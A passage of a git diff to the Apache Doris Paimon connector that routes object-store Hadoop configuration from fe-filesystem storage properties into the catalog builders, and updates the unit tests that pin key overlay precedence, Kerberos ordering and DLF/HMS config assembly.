PaimonCatalogFactory.buildHadoopConfiguration(properties); + Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(properties, storageHadoopConfig); return createCatalogFromContext(CatalogContext.create(options, conf), flavor, "Failed to create Paimon catalog with JDBC metastore"); } @@ -163,7 +169,7 @@ private Catalog createCatalog() { // file reach the live metastore client (legacy HMSBaseProperties parity). Map hiveConfFiles = context.loadHiveConfResources( PaimonCatalogFactory.firstNonBlank(properties, "hive.conf.resources")); - HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(properties, hiveConfFiles); + HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(properties, hiveConfFiles, storageHadoopConfig); return createCatalogFromContext(CatalogContext.create(options, hc), flavor, "Failed to create Paimon catalog with HMS metastore"); } @@ -172,6 +178,7 @@ private Catalog createCatalog() { // generic S3 one). Enforced at catalog build, before the HiveConf is assembled, // matching legacy PaimonAliyunDLFMetaStoreProperties.initializeCatalog timing. PaimonCatalogFactory.requireOssStorageForDlf(properties); + // DLF storage is OSS (fe-filesystem-bound, in storageHadoopConfig); overlaid below. // NOTE (B1/cutover-blocker P5-B7): same metastore=hive runtime gap as the hms branch // above — the Thrift metastore client (IMetaStoreClient/HiveMetaStoreClient, here the // Aliyun ProxyMetaStoreClient) is host-provided via hive-catalog-shade at cutover, not @@ -180,7 +187,7 @@ private Catalog createCatalog() { // metastore=hive paimon catalog created through the plugin throws neither // NoClassDefFoundError (.../IMetaStoreClient) nor a Configuration/HiveConf // LinkageError/ClassCastException. - HiveConf hc = PaimonCatalogFactory.buildDlfHiveConf(properties); + HiveConf hc = PaimonCatalogFactory.buildDlfHiveConf(properties, storageHadoopConfig); return createCatalogFromContext(CatalogContext.create(options, hc), flavor, "Failed to create Paimon catalog with DLF metastore"); } @@ -189,6 +196,25 @@ private Catalog createCatalog() { } } + /** + * Assembles the canonical object-store Hadoop config from the FE-bound storage properties (P1-T03). + * fe-core binds the catalog's raw property map to fe-filesystem {@link StorageProperties} and hands + * them over via {@link ConnectorContext#getStorageProperties()}; here we merge each one's + * {@code toHadoopProperties().toHadoopConfigurationMap()} (fs.s3a.* / Jindo fs.oss.* / fs.cosn.* / + * fs.obs.* keys). This replaces the legacy fe-property + * {@code StorageProperties.buildObjectStorageHadoopConfig(properties)} call that + * {@link PaimonCatalogFactory#buildHadoopConfiguration}/{@code buildHmsHiveConf}/{@code buildDlfHiveConf} + * used to make. Empty when no static object-store storage is configured — e.g. an HDFS-only catalog + * (which reaches the conf via the raw fs./dfs./hadoop. passthrough) or REST (the server owns storage). + */ + private Map buildStorageHadoopConfig() { + Map merged = new HashMap<>(); + for (StorageProperties sp : context.getStorageProperties()) { + sp.toHadoopProperties().ifPresent(h -> merged.putAll(h.toHadoopConfigurationMap())); + } + return merged; + } + private Catalog createCatalogFromContext(CatalogContext catalogContext, String flavor, String failureMessage) { // Pin the thread-context classloader to the plugin loader for the duration of catalog // creation (FIX-PAIMON-HADOOP-CLASSLOADER). Hadoop's FileSystem ServiceLoader diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java index fd632cdfd501f8..48da58b431c91b 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonCatalogFactoryTest.java @@ -23,6 +23,7 @@ import org.junit.jupiter.api.Assertions; import org.junit.jupiter.api.Test; +import java.util.Collections; import java.util.HashMap; import java.util.Map; @@ -30,11 +31,21 @@ * Unit tests for {@link PaimonCatalogFactory}, the pure flavor-assembly core. * *

      These tests are entirely offline: {@code buildCatalogOptions} is a pure transform - * (Map in, Paimon {@link Options} out) and {@code validate} is fail-fast pre-flight, so no - * live catalog, hadoop config, or env is touched. No Mockito — props are plain maps. + * (Map in, Paimon {@link Options} out), {@code validate} is fail-fast pre-flight, and the Hadoop + * config builders are pure (Maps in, conf out), so no live catalog or env is touched. No Mockito — + * props are plain maps. * *

      This is the parity baseline for B1: the per-flavor option keys MUST mirror the legacy * fe-core {@code AbstractPaimonProperties} + each {@code Paimon*MetaStoreProperties}. + * + *

      P1-T03: the canonical object-store translation ({@code s3.*}/{@code oss.*}/... -> {@code fs.s3a.*}) + * moved OUT of this factory to fe-filesystem; the builders now receive it pre-computed as a + * {@code storageHadoopConfig} map (what {@code PaimonConnector} assembles from + * {@code ConnectorContext.getStorageProperties().toHadoopConfigurationMap()}). These tests therefore + * pin the connector-LOCAL contract — storage-map overlay, {@code paimon.*} re-key, raw + * {@code fs./dfs./hadoop.} passthrough, last-write-wins, kerberos-after-storage — NOT the canonical + * translation, which is owned and tested by fe-filesystem's {@code *FileSystemPropertiesTest}. The + * end-to-end new/old equivalence is gated by the docker 5-flavor run (P1-T06; see DV-003). */ public class PaimonCatalogFactoryTest { @@ -46,6 +57,15 @@ private static Map props(String... kv) { return m; } + /** + * A pre-computed object-store storage Hadoop-config map — the fe-filesystem + * {@code toHadoopConfigurationMap()} output the connector now overlays. {@code storage()} with no + * args is the no-static-object-store case (HDFS-only / REST), where the map is empty. + */ + private static Map storage(String... kv) { + return props(kv); + } + // --------------------------------------------------------------------- // buildCatalogOptions — per-flavor metastore identifier + warehouse // --------------------------------------------------------------------- @@ -311,7 +331,9 @@ public void validateDefaultsToFilesystemWhenTypeAbsent() { } // --------------------------------------------------------------------- - // buildHadoopConfiguration — S3 prefix normalization + raw fs./dfs. passthrough + // buildHadoopConfiguration — storage-config overlay + paimon.* re-key + raw passthrough + // (P1-T03: the canonical object-store translation now arrives pre-computed in storageHadoopConfig + // from ConnectorContext.getStorageProperties(); the connector-local overlay/last-write-wins stays) // --------------------------------------------------------------------- @Test @@ -324,19 +346,19 @@ public void buildHadoopConfigurationNormalizesS3PrefixesAndCopiesRawKeys() { "fs.defaultFS", "hdfs://nn:8020", "dfs.nameservices", "nn", "hadoop.security.authentication", "kerberos", - "paimon.read.batch-size", "4096")); - - // WHY: the live FileIO/S3FileIO only recognizes Hadoop-prefixed keys; the legacy - // normalizeS3Config strips each of the four user storage prefixes and re-keys them under - // fs.s3a., while genuine fs.*/dfs./hadoop.* keys are passed through verbatim so HDFS/auth - // config reaches the catalog. MUTATION: not normalizing to fs.s3a. (key still under the old - // prefix), or dropping the raw fs./dfs./hadoop. passthrough -> red. + "paimon.read.batch-size", "4096"), storage()); + + // WHY: the live FileIO/S3FileIO only recognizes Hadoop-prefixed keys; the connector strips each + // of the four user storage prefixes (paimon.s3./s3a./fs.s3./fs.oss.) and re-keys them under + // fs.s3a., while genuine fs.*/dfs./hadoop.* keys are passed through verbatim so HDFS/auth config + // reaches the catalog. This connector-local overlay is UNCHANGED by P1-T03 (only the canonical + // object-store translation moved out to storageHadoopConfig). MUTATION: not normalizing to + // fs.s3a. (key still under the old prefix), or dropping the raw fs./dfs./hadoop. passthrough -> red. Assertions.assertEquals("ak", conf.get("fs.s3a.access-key")); Assertions.assertEquals("sk", conf.get("fs.s3a.secret-key")); Assertions.assertEquals("s3.amazonaws.com", conf.get("fs.s3a.endpoint")); - // paimon.fs.oss.* also normalizes onto the fs.s3a. prefix (legacy behavior: all four - // userStoragePrefixes map to FS_S3A_PREFIX). Distinct suffix to avoid colliding with the - // paimon.fs.s3.endpoint above (HashMap iteration order is not guaranteed). + // paimon.fs.oss.* also normalizes onto the fs.s3a. prefix (all four userStoragePrefixes map to + // FS_S3A_PREFIX). Distinct suffix to avoid colliding with paimon.fs.s3.endpoint above. Assertions.assertEquals("oss-cn.aliyuncs.com", conf.get("fs.s3a.endpoint.region")); Assertions.assertEquals("hdfs://nn:8020", conf.get("fs.defaultFS")); Assertions.assertEquals("nn", conf.get("dfs.nameservices")); @@ -346,6 +368,52 @@ public void buildHadoopConfigurationNormalizesS3PrefixesAndCopiesRawKeys() { Assertions.assertNull(conf.get("read.batch-size")); } + @Test + public void buildHadoopConfigurationAppliesStorageHadoopConfig() { + Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration( + props("fs.defaultFS", "hdfs://nn:8020"), + storage("fs.s3a.access.key", "ak", + "fs.s3a.endpoint", "s3.amazonaws.com", + "fs.s3a.impl", "org.apache.hadoop.fs.s3a.S3AFileSystem")); + + // WHY (P1-T03): the canonical object-store config (fs.s3a.* etc.) now arrives PRE-COMPUTED in + // storageHadoopConfig — assembled by PaimonConnector from ConnectorContext.getStorageProperties() + // via fe-filesystem's toHadoopConfigurationMap() — and the connector overlays it verbatim. Before + // P1-T03 the connector recomputed it from props via fe-property buildObjectStorageHadoopConfig. + // MUTATION: not applying storageHadoopConfig (fs.s3a.access.key null) -> red. + Assertions.assertEquals("ak", conf.get("fs.s3a.access.key")); + Assertions.assertEquals("s3.amazonaws.com", conf.get("fs.s3a.endpoint")); + Assertions.assertEquals("org.apache.hadoop.fs.s3a.S3AFileSystem", conf.get("fs.s3a.impl")); + // the raw fs./dfs./hadoop. passthrough still applies alongside the pre-computed storage map. + Assertions.assertEquals("hdfs://nn:8020", conf.get("fs.defaultFS")); + } + + @Test + public void buildHadoopConfigurationExplicitFsS3aKeyOverridesStorageConfig() { + Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration( + props("fs.s3a.access.key", "explicit"), + storage("fs.s3a.access.key", "from-storage")); + + // WHY: the raw fs.* passthrough runs AFTER the storageHadoopConfig overlay (last-write-wins = + // legacy addResource(getHadoopStorageConfig) THEN appendUserHadoopConfig ordering), so a power + // user who explicitly set fs.s3a.access.key in the catalog props still wins over the + // fe-filesystem-derived value. MUTATION: reversing precedence (storage overlays raw) -> "from-storage" -> red. + Assertions.assertEquals("explicit", conf.get("fs.s3a.access.key")); + } + + @Test + public void buildHadoopConfigurationPaimonPrefixOverridesStorageConfig() { + Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration( + props("paimon.s3.endpoint", "from-paimon"), + storage("fs.s3a.endpoint", "from-storage")); + + // WHY: the paimon.* prefix re-key (paimon.s3.endpoint -> fs.s3a.endpoint) is part of the + // connector-specific overlay that runs LAST, so an explicit paimon.s3.* key wins over the + // fe-filesystem storage map (last-write-wins). MUTATION: storage overlaying the paimon.* re-key + // (fs.s3a.endpoint == "from-storage") -> red. + Assertions.assertEquals("from-paimon", conf.get("fs.s3a.endpoint")); + } + // --------------------------------------------------------------------- // buildHmsHiveConf — metastore uri + hive.* verbatim + auth key + storage overlay // --------------------------------------------------------------------- @@ -358,13 +426,13 @@ public void buildHmsHiveConfSetsUriHiveKeysAuthAndStorage() { "hive.metastore.client.principal", "doris@REALM", "hive.metastore.client.keytab", "/etc/doris.keytab", "hadoop.security.authentication", "kerberos", - "paimon.s3.access-key", "ak")); + "paimon.s3.access-key", "ak"), Collections.emptyMap(), Collections.emptyMap()); // WHY: a live HiveCatalog reads the metastore uri from the HiveConf, honors any user hive.* - // override, and needs the auth keys (alongside the FE-injected UGI) plus the storage config - // to reach the warehouse. The "uri" alias must resolve to hive.metastore.uris. MUTATION: - // missing metastore uri, dropping a hive.* override, dropping an auth key, or not overlaying - // the normalized storage config -> red. + // override, and needs the auth keys (alongside the FE-injected UGI). The "uri" alias must + // resolve to hive.metastore.uris, and the paimon.s3.* key must re-key onto fs.s3a. via the + // connector overlay. MUTATION: missing metastore uri, dropping a hive.* override, dropping an + // auth key, or not applying the connector storage overlay -> red. Assertions.assertEquals("thrift://nn:9083", hc.get("hive.metastore.uris")); Assertions.assertEquals("true", hc.get("hive.metastore.sasl.enabled")); Assertions.assertEquals("doris@REALM", hc.get("hive.metastore.client.principal")); @@ -373,6 +441,21 @@ public void buildHmsHiveConfSetsUriHiveKeysAuthAndStorage() { Assertions.assertEquals("ak", hc.get("fs.s3a.access-key")); } + @Test + public void buildHmsHiveConfOverlaysStorageHadoopConfig() { + HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf( + props("uri", "thrift://nn:9083"), + Collections.emptyMap(), + storage("fs.s3a.access.key", "ak", "fs.s3a.endpoint", "s3.amazonaws.com")); + + // WHY (P1-T03): the HMS HiveConf must carry the pre-computed object-store storage config so the + // live HiveCatalog can read warehouse data files over S3. MUTATION: not overlaying + // storageHadoopConfig (fs.s3a.access.key null) -> red. + Assertions.assertEquals("ak", hc.get("fs.s3a.access.key")); + Assertions.assertEquals("s3.amazonaws.com", hc.get("fs.s3a.endpoint")); + Assertions.assertEquals("thrift://nn:9083", hc.get("hive.metastore.uris")); + } + @Test public void buildHmsHiveConfKerberosSetsSaslServicePrincipalAndAuthToLocal() { HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props( @@ -381,7 +464,8 @@ public void buildHmsHiveConfKerberosSetsSaslServicePrincipalAndAuthToLocal() { "hive.metastore.client.principal", "doris@REALM", "hive.metastore.client.keytab", "/etc/doris.keytab", "hive.metastore.service.principal", "hive/_HOST@REALM", - "hadoop.security.auth_to_local", "RULE:[1:$1@$0](.*@REALM)s/@.*//")); + "hadoop.security.auth_to_local", "RULE:[1:$1@$0](.*@REALM)s/@.*//"), + Collections.emptyMap(), Collections.emptyMap()); // WHY (I-2 parity gap): legacy HMSBaseProperties.initHadoopAuthenticator, when the metastore // auth type is kerberos, sets hive.metastore.sasl.enabled=true + @@ -407,7 +491,8 @@ public void buildHmsHiveConfKerberosAcceptsServicePrincipalAlias() { // alias: legacy @ConnectorProperty(names={"hive.metastore.service.principal", // "hive.metastore.kerberos.principal"}) — the bare kerberos.principal key is the // service-principal alias when service.principal is absent. - "hive.metastore.kerberos.principal", "hive/_HOST@REALM")); + "hive.metastore.kerberos.principal", "hive/_HOST@REALM"), + Collections.emptyMap(), Collections.emptyMap()); // WHY (I-2 alias parity): the service principal can arrive under either alias; the // hive.* verbatim copy already lands hive.metastore.kerberos.principal, but the alias @@ -425,7 +510,8 @@ public void buildHmsHiveConfKerberosSurvivesSimpleHdfsAuthPassthrough() { "hive.metastore.authentication.type", "kerberos", "hive.metastore.client.principal", "doris@REALM", "hive.metastore.client.keytab", "/etc/doris.keytab", - "hadoop.security.authentication", "simple")); + "hadoop.security.authentication", "simple"), + Collections.emptyMap(), Collections.emptyMap()); // WHY (pre-existing MAJOR, found by the FIX-FECONF impl review): legacy runs initHadoopAuthenticator // LAST, so a kerberized HMS forces hadoop.security.authentication=kerberos authoritatively even when @@ -439,11 +525,35 @@ public void buildHmsHiveConfKerberosSurvivesSimpleHdfsAuthPassthrough() { Assertions.assertEquals("true", hc.get("hive.metastore.sasl.enabled")); } + @Test + public void buildHmsHiveConfKerberosSurvivesStorageOverlayAuthPassthrough() { + HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props( + "uri", "thrift://nn:9083", + "hive.metastore.authentication.type", "kerberos", + "hive.metastore.client.principal", "doris@REALM", + "hive.metastore.client.keytab", "/etc/doris.keytab"), + Collections.emptyMap(), + // a storage map that carries a hadoop.security.authentication must NOT clobber the + // forced kerberos auth. + storage("hadoop.security.authentication", "simple")); + + // WHY (P1-T03 ordering invariant, sibling to ...SurvivesSimpleHdfsAuthPassthrough): P1-T03 moved + // the object-store config source to the storageHadoopConfig map, which applyStorageConfig applies + // BEFORE the kerberos-conditional block (the same position the old fe-property canonical map held). + // So a hadoop.security.authentication arriving via the STORAGE MAP (not just the raw props + // passthrough) must still be overridden to kerberos — proving the kerberos block runs after the + // storage overlay regardless of which source set the key. MUTATION: applying storageHadoopConfig + // AFTER the kerberos block (or dropping the force) -> "simple" wins -> red. + Assertions.assertEquals("kerberos", hc.get("hadoop.security.authentication")); + Assertions.assertEquals("true", hc.get("hive.metastore.sasl.enabled")); + } + @Test public void buildHmsHiveConfSimpleDoesNotEnableSasl() { HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props( "uri", "thrift://nn:9083", - "hive.metastore.authentication.type", "simple")); + "hive.metastore.authentication.type", "simple"), + Collections.emptyMap(), Collections.emptyMap()); // WHY (I-2 negative parity): legacy only enables SASL on the kerberos branch; a simple // (non-kerberized) HMS must NOT advertise sasl.enabled=true or it would attempt a GSSAPI @@ -457,7 +567,8 @@ public void buildHmsHiveConfSimpleDoesNotEnableSasl() { @Test public void buildHmsHiveConfSetsClientSocketTimeoutDefault() { - HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props("uri", "thrift://nn:9083")); + HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf( + props("uri", "thrift://nn:9083"), Collections.emptyMap(), Collections.emptyMap()); // WHY (I-2): legacy checkAndInit defaults the metastore client socket timeout to // Config.hive_metastore_client_timeout_second (=10) when the user has not overridden it @@ -499,7 +610,7 @@ public void requireOssStorageForDlfAcceptsOssConfig() { } // --------------------------------------------------------------------- - // buildDlfHiveConf — 8 dlf.catalog.* keys + endpoint-from-region + uid fallback + throw + // buildDlfHiveConf — 8 dlf.catalog.* keys + endpoint-from-region + uid fallback + throw + storage // --------------------------------------------------------------------- @Test @@ -513,12 +624,13 @@ public void buildDlfHiveConfSetsAllEightDlfKeysAndOverlaysStorage() { "dlf.catalog.uid", "uid-1", "dlf.catalog.id", "cat-1", "dlf.catalog.proxyMode", "DLF_ONLY", - "paimon.fs.oss.access-key", "oss-ak")); + "paimon.fs.oss.access-key", "oss-ak"), Collections.emptyMap()); // WHY: DLF is adapted onto a HiveCatalog via the ProxyMetaStoreClient, which reads the eight // DataLakeConfig.CATALOG_* keys from the HiveConf; all eight must be present with the - // verified literal key names, plus the OSS storage overlay. MUTATION: a wrong/missing - // dlf.catalog.* key name, or not overlaying the storage config -> red. + // verified literal key names, plus the connector storage overlay (here the paimon.fs.oss.* + // re-key onto fs.s3a.). MUTATION: a wrong/missing dlf.catalog.* key name, or not applying the + // connector storage overlay -> red. Assertions.assertEquals("ak", hc.get("dlf.catalog.accessKeyId")); Assertions.assertEquals("sk", hc.get("dlf.catalog.accessKeySecret")); Assertions.assertEquals("tok", hc.get("dlf.catalog.securityToken")); @@ -530,13 +642,31 @@ public void buildDlfHiveConfSetsAllEightDlfKeysAndOverlaysStorage() { Assertions.assertEquals("oss-ak", hc.get("fs.s3a.access-key")); } + @Test + public void buildDlfHiveConfOverlaysStorageHadoopConfig() { + HiveConf hc = PaimonCatalogFactory.buildDlfHiveConf( + props("dlf.access_key", "ak", + "dlf.secret_key", "sk", + "dlf.endpoint", "dlf.cn-hangzhou.aliyuncs.com"), + storage("fs.oss.accessKeyId", "oak", + "fs.oss.impl", "com.aliyun.jindodata.oss.JindoOssFileSystem")); + + // WHY (P1-T03): the DLF HiveConf must carry the pre-computed OSS storage config (Jindo fs.oss.*) + // from fe-filesystem so the ProxyMetaStoreClient/FileIO can read OSS data files, while the + // dlf.catalog.* metastore keys stay present. MUTATION: not overlaying storageHadoopConfig + // (fs.oss.accessKeyId null) -> red. + Assertions.assertEquals("oak", hc.get("fs.oss.accessKeyId")); + Assertions.assertEquals("com.aliyun.jindodata.oss.JindoOssFileSystem", hc.get("fs.oss.impl")); + Assertions.assertEquals("ak", hc.get("dlf.catalog.accessKeyId")); + } + @Test public void buildDlfHiveConfDerivesVpcEndpointFromRegionByDefault() { HiveConf hc = PaimonCatalogFactory.buildDlfHiveConf(props( "dlf.access_key", "ak", "dlf.secret_key", "sk", "dlf.region", "cn-beijing", - "dlf.catalog.uid", "uid-1")); + "dlf.catalog.uid", "uid-1"), Collections.emptyMap()); // WHY: legacy checkAndInit derives the endpoint from the region when the endpoint is blank; // the DEFAULT (accessPublic=false) is the VPC endpoint. MUTATION: deriving the public @@ -551,7 +681,7 @@ public void buildDlfHiveConfDerivesPublicEndpointWhenAccessPublic() { "dlf.secret_key", "sk", "dlf.region", "cn-beijing", "dlf.access.public", "true", - "dlf.catalog.uid", "uid-1")); + "dlf.catalog.uid", "uid-1"), Collections.emptyMap()); // WHY: when dlf.access.public is truthy the public endpoint (dlf....) is used instead // of the VPC one. MUTATION: ignoring accessPublic (still deriving the vpc endpoint) -> red. @@ -564,7 +694,7 @@ public void buildDlfHiveConfFallsBackCatalogIdToUid() { "dlf.access_key", "ak", "dlf.secret_key", "sk", "dlf.endpoint", "dlf.cn-hangzhou.aliyuncs.com", - "dlf.catalog.uid", "uid-42")); + "dlf.catalog.uid", "uid-42"), Collections.emptyMap()); // WHY: legacy checkAndInit defaults the catalog id to the uid when no explicit catalog id is // given (the DLF account's default catalog is keyed by uid). MUTATION: leaving the catalog @@ -581,165 +711,12 @@ public void buildDlfHiveConfThrowsWhenEndpointAndRegionBlank() { () -> PaimonCatalogFactory.buildDlfHiveConf(props( "dlf.access_key", "ak", "dlf.secret_key", "sk", - "dlf.catalog.uid", "uid-1"))); + "dlf.catalog.uid", "uid-1"), Collections.emptyMap())); Assertions.assertTrue(ex.getMessage().contains("dlf.endpoint")); } // --------------------------------------------------------------------- - // FIX-STORAGE-CREDS — canonical s3.*/oss.*/AWS_* alias translation - // (ported legacy appendS3HdfsProperties + OSSProperties.initializeHadoopStorageConfig) - // --------------------------------------------------------------------- - - @Test - public void buildHadoopConfigurationTranslatesCanonicalS3Credentials() { - Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( - "s3.access_key", "ak", - "s3.secret_key", "sk", - "s3.endpoint", "s3.ap-east-1.amazonaws.com")); - - // WHY (BLOCKER, Finding 9.1): a filesystem catalog created with the DOCUMENTED canonical - // keys (the same ones test_paimon_s3.groovy passes) must reach the S3 FileIO with real - // credentials. Before the fix applyStorageConfig recognized only paimon.*/raw fs.* keys, so - // s3.access_key/s3.secret_key/s3.endpoint were SILENTLY DROPPED and the Paimon FileSystem - // catalog hit S3 anonymously -> access-denied at plan time. MUTATION: dropping the canonical - // s3.* translation (today's behavior) leaves fs.s3a.access.key null -> red. - Assertions.assertEquals("ak", conf.get("fs.s3a.access.key")); - Assertions.assertEquals("sk", conf.get("fs.s3a.secret.key")); - Assertions.assertEquals("s3.ap-east-1.amazonaws.com", conf.get("fs.s3a.endpoint")); - Assertions.assertEquals("org.apache.hadoop.fs.s3a.SimpleAWSCredentialsProvider", - conf.get("fs.s3a.aws.credentials.provider")); - Assertions.assertEquals("org.apache.hadoop.fs.s3a.S3AFileSystem", conf.get("fs.s3a.impl")); - Assertions.assertEquals("true", conf.get("fs.s3.impl.disable.cache")); - } - - @Test - public void buildHadoopConfigurationTranslatesAwsEnvAliases() { - Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( - "AWS_ACCESS_KEY", "ak", - "AWS_SECRET_KEY", "sk", - "AWS_TOKEN", "tok", - "AWS_ENDPOINT", "s3.amazonaws.com", - "AWS_REGION", "us-east-1")); - - // WHY: legacy accepted the AWS_* alias family (S3Properties @ConnectorProperty names). This - // verifies the alias priority list resolves them (not just the primary s3.* key), including - // the session token and endpoint region. MUTATION: dropping any AWS_* alias -> red. - Assertions.assertEquals("ak", conf.get("fs.s3a.access.key")); - Assertions.assertEquals("sk", conf.get("fs.s3a.secret.key")); - Assertions.assertEquals("tok", conf.get("fs.s3a.session.token")); - Assertions.assertEquals("s3.amazonaws.com", conf.get("fs.s3a.endpoint")); - Assertions.assertEquals("us-east-1", conf.get("fs.s3a.endpoint.region")); - } - - @Test - public void buildHadoopConfigurationDoesNotEmitCredsProviderForAnonymousBucket() { - Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( - "s3.endpoint", "s3.amazonaws.com", - "s3.region", "us-east-1")); - - // WHY (parity): legacy guards the credentials provider + access/secret keys behind - // isNotBlank(accessKey), so a public/anonymous bucket (endpoint/region but no keys) still - // gets fs.s3.impl + endpoint but is NOT forced onto our single SimpleAWSCredentialsProvider - // override (which would break the env/IAM fallback chain). access.key has no Hadoop default - // so it stays null; the provider key DOES have a Hadoop default chain, so the meaningful - // check is that we did not override it to Simple-only. MUTATION: emitting the provider or a - // blank access key unconditionally -> red (would force credentialed auth on a public bucket). - Assertions.assertEquals("s3.amazonaws.com", conf.get("fs.s3a.endpoint")); - Assertions.assertEquals("us-east-1", conf.get("fs.s3a.endpoint.region")); - Assertions.assertEquals("org.apache.hadoop.fs.s3a.S3AFileSystem", conf.get("fs.s3a.impl")); - Assertions.assertNull(conf.get("fs.s3a.access.key")); - Assertions.assertNotEquals("org.apache.hadoop.fs.s3a.SimpleAWSCredentialsProvider", - conf.get("fs.s3a.aws.credentials.provider"), - "anonymous bucket must not be forced onto our Simple-only credentials provider"); - } - - @Test - public void buildHadoopConfigurationExplicitFsS3aKeyOverridesCanonical() { - Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( - "s3.access_key", "canon", - "fs.s3a.access.key", "explicit")); - - // WHY: the raw fs.* passthrough runs AFTER the canonical translation (last-write-wins = - // legacy addResource(getHadoopStorageConfig) THEN appendUserHadoopConfig ordering), so a - // power user who explicitly set fs.s3a.access.key still wins over the canonical alias. - // MUTATION: a refactor that reverses precedence (canonical overlays raw) -> "canon" -> red. - Assertions.assertEquals("explicit", conf.get("fs.s3a.access.key")); - } - - @Test - public void buildDlfHiveConfTranslatesCanonicalOssCredentials() { - HiveConf hc = PaimonCatalogFactory.buildDlfHiveConf(props( - "dlf.access_key", "dak", - "dlf.secret_key", "dsk", - "dlf.endpoint", "dlf.cn-hangzhou.aliyuncs.com", - "dlf.region", "cn-hangzhou", - "oss.access_key", "oak", - "oss.secret_key", "osk", - "oss.endpoint", "oss-cn-hangzhou.aliyuncs.com", - "oss.region", "cn-hangzhou")); - - // WHY (BLOCKER, Finding 9.2): the DLF gate passes when an oss.* key is present, but before - // the fix buildDlfHiveConf overlaid storage only through the old applyStorageConfig, which - // dropped the canonical oss.access_key/oss.secret_key/oss.endpoint/oss.region -> the HiveConf - // carried NO usable OSS FileIO config -> DLF/HMS catalog could not read OSS data files. The - // dlf.catalog.* metastore keys must still be present AND the OSS (Jindo) storage keys set. - // MUTATION: dropping the canonical OSS translation leaves fs.oss.accessKeyId null -> red. - Assertions.assertEquals("dak", hc.get("dlf.catalog.accessKeyId")); - Assertions.assertEquals("dlf.cn-hangzhou.aliyuncs.com", hc.get("dlf.catalog.endpoint")); - Assertions.assertEquals("oak", hc.get("fs.oss.accessKeyId")); - Assertions.assertEquals("osk", hc.get("fs.oss.accessKeySecret")); - Assertions.assertEquals("oss-cn-hangzhou.aliyuncs.com", hc.get("fs.oss.endpoint")); - Assertions.assertEquals("cn-hangzhou", hc.get("fs.oss.region")); - Assertions.assertEquals("com.aliyun.jindodata.oss.JindoOssFileSystem", hc.get("fs.oss.impl")); - } - - @Test - public void requireOssStorageForDlfThenBuildDlfHiveConfYieldsOssCreds() { - Map p = props( - "dlf.access_key", "dak", - "dlf.secret_key", "dsk", - "dlf.endpoint", "dlf.cn-hangzhou.aliyuncs.com", - "oss.access_key", "oak", - "oss.secret_key", "osk", - "oss.endpoint", "oss-cn-hangzhou.aliyuncs.com"); - - // WHY (BLOCKER end-to-end): the gate and the storage translation must agree on the SAME key - // set. With canonical oss.* only (no paimon.fs.oss.*), the gate must pass AND the resulting - // HiveConf must carry usable OSS credentials. Before the fix the gate passed but the conf had - // no creds. MUTATION: gate/translation disagreeing on the oss.* key set -> red. - Assertions.assertDoesNotThrow(() -> PaimonCatalogFactory.requireOssStorageForDlf(p)); - Assertions.assertEquals("oak", PaimonCatalogFactory.buildDlfHiveConf(p).get("fs.oss.accessKeyId")); - } - - @Test - public void buildDlfHiveConfDerivesOssEndpointFromRegion() { - HiveConf vpc = PaimonCatalogFactory.buildDlfHiveConf(props( - "dlf.access_key", "dak", - "dlf.secret_key", "dsk", - "dlf.endpoint", "dlf.cn-hangzhou.aliyuncs.com", - "oss.region", "cn-hangzhou")); - - // WHY (DLF parity, Finding 9.2 completeness): DLF users typically pass a region, not an - // explicit oss.endpoint. Legacy derived the OSS endpoint from the region via - // OSSProperties.getOssEndpoint(region, accessPublic); the DEFAULT (non-public) is the - // -internal endpoint. MUTATION: not deriving (fs.oss.endpoint null) or using the public form - // by default -> red. - Assertions.assertEquals("oss-cn-hangzhou-internal.aliyuncs.com", vpc.get("fs.oss.endpoint")); - - HiveConf pub = PaimonCatalogFactory.buildDlfHiveConf(props( - "dlf.access_key", "dak", - "dlf.secret_key", "dsk", - "dlf.endpoint", "dlf.cn-hangzhou.aliyuncs.com", - "oss.region", "cn-hangzhou", - "dlf.access.public", "true")); - - // WHY: when access is public the endpoint has no -internal suffix. MUTATION: ignoring - // accessPublic -> red. - Assertions.assertEquals("oss-cn-hangzhou.aliyuncs.com", pub.get("fs.oss.endpoint")); - } - - // --------------------------------------------------------------------- - // FIX-HMS-CONFRES — buildHmsHiveConf(props, hiveConfResources) base-merge + // FIX-HMS-CONFRES — buildHmsHiveConf(props, hiveConfResources, storage) base-merge // --------------------------------------------------------------------- @Test @@ -748,7 +725,7 @@ public void buildHmsHiveConfOverlaysResolvedHiveConfResourcesAsBase() { fileKeys.put("hive.metastore.sasl.qop", "auth-conf"); fileKeys.put("hive.metastore.thrift.transport", "custom"); HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf( - props("uri", "thrift://nn:9083"), fileKeys); + props("uri", "thrift://nn:9083"), fileKeys, Collections.emptyMap()); // WHY (MAJOR, Finding §8): connection-critical keys present ONLY in the external hive-site.xml // (hive.conf.resources) must reach the catalog HiveConf — before the fix buildHmsHiveConf @@ -767,7 +744,7 @@ public void buildHmsHiveConfUserHivePropOverridesFileResource() { fileKeys.put("hive.metastore.sasl.qop", "FILE-qop"); HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props( "uri", "thrift://nn:9083", - "hive.metastore.sasl.qop", "USER-qop"), fileKeys); + "hive.metastore.sasl.qop", "USER-qop"), fileKeys, Collections.emptyMap()); // WHY: legacy precedence is file=base, user hive.* WINS. This can only pass if the file map is // applied 